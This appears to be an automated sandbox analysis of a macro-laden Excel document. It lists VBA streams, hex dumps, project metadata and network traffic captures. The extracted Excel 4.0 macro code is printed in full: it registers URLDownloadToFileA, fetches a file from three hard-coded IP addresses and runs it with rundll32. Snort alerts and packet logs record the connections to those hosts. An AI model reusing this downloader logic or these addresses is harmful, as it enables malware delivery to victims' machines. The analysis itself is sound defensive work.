Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2015-06-05T18:19:34Z |
Last Saved Time: | 2021-05-04T08:11:27Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams with VBA |
---|
VBA File Name: Blasr.bas, Stream Size: 1166 |
---|
General | |
---|---|
Stream Path: | VBA/Blasr |
VBA File Name: | Blasr.bas |
Stream Size: | 1166 |
Data ASCII: | . . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 fd 03 00 00 00 00 00 00 01 00 00 00 1c cc 5e 9c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
"Blasr" |
Application.Run |
Attribute |
Auto_Open() |
VB_Name |
Private |
VBA Code |
---|
|
VBA File Name: Briks.cls, Stream Size: 990 |
---|
General | |
---|---|
Stream Path: | VBA/Briks |
VBA File Name: | Briks.cls |
Stream Size: | 990 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
"Briks" |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Byutut.bas, Stream Size: 1056 |
---|
General | |
---|---|
Stream Path: | VBA/Byutut |
VBA File Name: | Byutut.bas |
Stream Size: | 1056 |
Data ASCII: | . . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 52 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 59 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Attribute |
VB_Name |
"Byutut" |
VBA Code |
---|
|
VBA File Name: Class1.cls, Stream Size: 1151 |
---|
General | |
---|---|
Stream Path: | VBA/Class1 |
VBA File Name: | Class1.cls |
Stream Size: | 1151 |
Data ASCII: | . . . . . . . . . Z . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 5a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 61 03 00 00 c5 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Class2.cls, Stream Size: 999 |
---|
General | |
---|---|
Stream Path: | VBA/Class2 |
VBA File Name: | Class2.cls |
Stream Size: | 999 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 7e e9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Class3.cls, Stream Size: 999 |
---|
General | |
---|---|
Stream Path: | VBA/Class3 |
VBA File Name: | Class3.cls |
Stream Size: | 999 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc c8 17 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Kikide.cls, Stream Size: 1249 |
---|
General | |
---|---|
Stream Path: | VBA/Kikide |
VBA File Name: | Kikide.cls |
Stream Size: | 1249 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 9a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff a1 03 00 00 29 04 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
"Kikide" |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: UserForm1.frm, Stream Size: 1526 |
---|
General | |
---|---|
Stream Path: | VBA/UserForm1 |
VBA File Name: | UserForm1.frm |
Stream Size: | 1526 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { \\ . . B . H N . . . . . I . . . . . O < . * N . 7 { / a . . . 0 $ . . . v . K . . . . 1 . . . . . . . . . h : . . L N . . V = . 5 . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 00 01 00 00 9e 04 00 00 e4 00 00 00 84 02 00 00 ff ff ff ff a5 04 00 00 09 05 00 00 00 00 00 00 01 00 00 00 1c cc 2b 09 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 7b 5c fd e6 42 8a 48 4e aa cd df d6 fd 49 99 1c 83 98 07 4f 3c d6 2a 4e ad 37 7b 2f 61 a2 ba cd 30 24 1b a6 ea 76 1d 4b a3 81 e7 c2 31 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Vrest.bas, Stream Size: 679 |
---|
General | |
---|---|
Stream Path: | VBA/Vrest |
VBA File Name: | Vrest.bas |
Stream Size: | 679 |
Data ASCII: | . . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 1c cc 27 ea 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Attribute |
"Vrest" |
VB_Name |
VBA Code |
---|
|
VBA File Name: Vsewd.cls, Stream Size: 990 |
---|
General | |
---|---|
Stream Path: | VBA/Vsewd |
VBA File Name: | Vsewd.cls |
Stream Size: | 990 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
"Vsewd" |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 856 |
Entropy: | 5.31019504221 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 4 4 8 1 7 C A 7 - 1 5 D A - 4 D 2 5 - B 4 C E - 4 7 0 F 9 E A 0 E 5 D F } " . . D o c u m e n t = K i k i d e / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = B r i k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = V s e w d / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . C l a s s = C l a s s 2 . . C l a s s = C l a s s 3 . . M o d u l e = B l a s r . . M o d u l e = V r e s t . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 |
Data Raw: | 49 44 3d 22 7b 34 34 38 31 37 43 41 37 2d 31 35 44 41 2d 34 44 32 35 2d 42 34 43 45 2d 34 37 30 46 39 45 41 30 45 35 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 69 6b 69 64 65 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 72 69 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 73 65 77 |
Stream Path: PROJECTwm, File Type: data, Stream Size: 209 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 209 |
Entropy: | 3.32661660177 |
Base64 Encoded: | False |
Data ASCII: | K i k i d e . K . i . k . i . d . e . . . B r i k s . B . r . i . k . s . . . B y u t u t . B . y . u . t . u . t . . . V s e w d . V . s . e . w . d . . . C l a s s 1 . C . l . a . s . s . 1 . . . C l a s s 2 . C . l . a . s . s . 2 . . . C l a s s 3 . C . l . a . s . s . 3 . . . B l a s r . B . l . a . s . r . . . V r e s t . V . r . e . s . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . . |
Data Raw: | 4b 69 6b 69 64 65 00 4b 00 69 00 6b 00 69 00 64 00 65 00 00 00 42 72 69 6b 73 00 42 00 72 00 69 00 6b 00 73 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 56 73 65 77 64 00 56 00 73 00 65 00 77 00 64 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 43 6c 61 73 73 32 00 43 00 6c 00 61 00 73 00 73 00 32 00 00 00 43 6c 61 73 73 33 00 43 |
Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97 |
---|
General | |
---|---|
Stream Path: | UserForm1/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.61064918306 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266 |
---|
General | |
---|---|
Stream Path: | UserForm1/\x3VBFrame |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 266 |
Entropy: | 4.62034133633 |
Base64 Encoded: | True |
Data ASCII: | V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w |
Data Raw: | 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 |
Stream Path: UserForm1/f, File Type: data, Stream Size: 38 |
---|
General | |
---|---|
Stream Path: | UserForm1/f |
File Type: | data |
Stream Size: | 38 |
Entropy: | 1.54052096453 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: UserForm1/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | UserForm1/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 4263 |
Entropy: | 4.38205341073 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Data Raw: | cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/dir, File Type: data, Stream Size: 1024 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 1024 |
Entropy: | 6.73319737871 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 fc b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 be 20 84 62 0e 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Macro 4.0 Code |
---|
,,"=CONCATENATE(AF80,AG80,AH78,AG78,AG79)",,,,,,"=CONCATENATE(AF80,AG81,AH78,AG78,AG79)",,1,,,,"=CONCATENATE(AF80,AG82,AH78,AG78,AG79)",,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""Grestes"")",,,.d,=NOW(),,,,,at,"=FORMULA(AG85&AG86&AG92,AI83)",,,,"=""http://""","=""91.211.91.81/""",,,=HALT(),,,"=""5.34.179.36/""",,,,,,"=""45.153.229.23/""",,uRlMon,,,,,,,,,,,,JJCCBB,,,,"=""URLDo""",,Belandes,,,,"=""wnloadT""",,,,,,,=GOTO(Blodas!G6),,,,,,,..\Ladfge.VDGfwr,,,,,,,,,,,,,,,,,,,,,,"=""oFileA""",,,,
"=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)""=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
,"=""rund""",,"=""ll32 ..\Ladfge.VDGfwr,DllReg""","=""isterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/04/21-17:31:37.151983 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49165 | 91.211.91.81 | 192.168.2.22 |
05/04/21-17:31:37.893150 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49166 | 5.34.179.36 | 192.168.2.22 |
05/04/21-17:31:38.095777 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 45.153.229.23 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 4, 2021 17:38:34.001015902 CEST | 49722 | 80 | 192.168.2.3 | 91.211.91.81 |
May 4, 2021 17:38:34.084767103 CEST | 80 | 49722 | 91.211.91.81 | 192.168.2.3 |
May 4, 2021 17:38:34.084867001 CEST | 49722 | 80 | 192.168.2.3 | 91.211.91.81 |
May 4, 2021 17:38:34.086118937 CEST | 49722 | 80 | 192.168.2.3 | 91.211.91.81 |
May 4, 2021 17:38:34.169622898 CEST | 80 | 49722 | 91.211.91.81 | 192.168.2.3 |
May 4, 2021 17:38:34.233530998 CEST | 80 | 49722 | 91.211.91.81 | 192.168.2.3 |
May 4, 2021 17:38:34.233715057 CEST | 49722 | 80 | 192.168.2.3 | 91.211.91.81 |
May 4, 2021 17:38:34.277417898 CEST | 49723 | 80 | 192.168.2.3 | 5.34.179.36 |
May 4, 2021 17:38:34.425004959 CEST | 80 | 49723 | 5.34.179.36 | 192.168.2.3 |
May 4, 2021 17:38:34.425205946 CEST | 49723 | 80 | 192.168.2.3 | 5.34.179.36 |
May 4, 2021 17:38:34.463059902 CEST | 49723 | 80 | 192.168.2.3 | 5.34.179.36 |
May 4, 2021 17:38:34.608505964 CEST | 80 | 49723 | 5.34.179.36 | 192.168.2.3 |
May 4, 2021 17:38:35.012475967 CEST | 80 | 49723 | 5.34.179.36 | 192.168.2.3 |
May 4, 2021 17:38:35.012568951 CEST | 49723 | 80 | 192.168.2.3 | 5.34.179.36 |
May 4, 2021 17:38:35.017116070 CEST | 49725 | 80 | 192.168.2.3 | 45.153.229.23 |
May 4, 2021 17:38:35.084460974 CEST | 80 | 49725 | 45.153.229.23 | 192.168.2.3 |
May 4, 2021 17:38:35.084939957 CEST | 49725 | 80 | 192.168.2.3 | 45.153.229.23 |
May 4, 2021 17:38:35.085726023 CEST | 49725 | 80 | 192.168.2.3 | 45.153.229.23 |
May 4, 2021 17:38:35.150355101 CEST | 80 | 49725 | 45.153.229.23 | 192.168.2.3 |
May 4, 2021 17:38:35.210279942 CEST | 80 | 49725 | 45.153.229.23 | 192.168.2.3 |
May 4, 2021 17:38:35.210450888 CEST | 49725 | 80 | 192.168.2.3 | 45.153.229.23 |
May 4, 2021 17:39:39.233378887 CEST | 80 | 49722 | 91.211.91.81 | 192.168.2.3 |
May 4, 2021 17:39:39.233545065 CEST | 49722 | 80 | 192.168.2.3 | 91.211.91.81 |
May 4, 2021 17:39:40.013036966 CEST | 80 | 49723 | 5.34.179.36 | 192.168.2.3 |
May 4, 2021 17:39:40.013144016 CEST | 49723 | 80 | 192.168.2.3 | 5.34.179.36 |
May 4, 2021 17:39:40.211793900 CEST | 80 | 49725 | 45.153.229.23 | 192.168.2.3 |
May 4, 2021 17:39:40.211869955 CEST | 49725 | 80 | 192.168.2.3 | 45.153.229.23 |
May 4, 2021 17:40:15.518287897 CEST | 49725 | 80 | 192.168.2.3 | 45.153.229.23 |
May 4, 2021 17:40:15.520262957 CEST | 49723 | 80 | 192.168.2.3 | 5.34.179.36 |
May 4, 2021 17:40:15.520785093 CEST | 49722 | 80 | 192.168.2.3 | 91.211.91.81 |
May 4, 2021 17:40:15.587034941 CEST | 80 | 49725 | 45.153.229.23 | 192.168.2.3 |
May 4, 2021 17:40:15.604607105 CEST | 80 | 49722 | 91.211.91.81 | 192.168.2.3 |
May 4, 2021 17:40:15.666804075 CEST | 80 | 49723 | 5.34.179.36 | 192.168.2.3 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 4, 2021 17:38:12.029839993 CEST | 49199 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:12.078516960 CEST | 53 | 49199 | 8.8.8.8 | 192.168.2.3 |
